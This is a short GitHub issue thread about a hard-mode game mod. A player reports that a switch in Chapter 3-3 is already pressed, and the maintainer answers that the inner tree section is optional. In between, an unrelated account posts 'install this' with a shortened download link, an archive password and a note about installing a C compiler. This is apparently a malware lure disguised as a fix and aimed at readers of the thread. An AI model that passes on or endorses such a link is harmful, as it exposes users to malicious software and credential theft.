### ISSUE TITLE
Bug on Chapter 3-3 

### ISSUE THREAD

**Issue by NotSoClassy** [L5050/SPM-Hard-Mode#1]
Hello,

I was playing the game with this mod, and I got to 3-3 where you climb up the tree, but it seems like the switch that you activate to finish the level is already pressed, so you can skip the whole inner tree part.

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Pass: changeme

you may need to install the c compiler

**Comment by L5050** [comment]
not a bug, the inner tree is optional
